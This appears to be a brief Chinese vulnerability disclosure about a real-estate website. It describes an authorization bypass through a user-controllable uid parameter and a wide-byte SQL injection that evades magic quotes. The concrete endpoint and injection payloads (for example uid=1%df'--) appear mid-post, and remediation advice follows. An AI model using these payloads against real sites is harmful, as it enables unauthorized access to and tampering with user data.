365房产网一个设置泄露+越权+注入 - 网站安全 -

http://blog.house365测试数据/ajaxuser.php?type=blog&action=atcblogclass&job=add

UPDATE pw_userinfo SET dirdb=......................

发送数据:

blogclass=AAAAAAAAAAAAAAAAA"\&itemid=1&uid=1&name=

注意了哦uid可以随便修改

修改了uid为1用户的博客标签。

gpc开启无法注入? 宽字节帮助你！

blogclass=007&itemid=1&uid=1%df'--&name=

 

WHERE uid='1€€'#' 呵呵闭合了呢。。。   

修改了uid为5用户的博客标签。

 

 gpc开启无法注入? 宽字节帮助你！

blogclass=007&itemid=1&uid=1%df'--&name=

   

WHERE uid='1€€'#' 呵呵闭合了呢。。。这个是主站注入哦。。。。全部用户的数据在。 修复方案： uid的SESSION或者cookies验证下.

宽字节注入：

介个建议使用 mysql _set_charset设置字符集 mysql_real_escape_string 转义sql语句

字符集为二进制

查看更多关于365房产网一个设置泄露+越权+注入 - 网站安全 -的详细内容...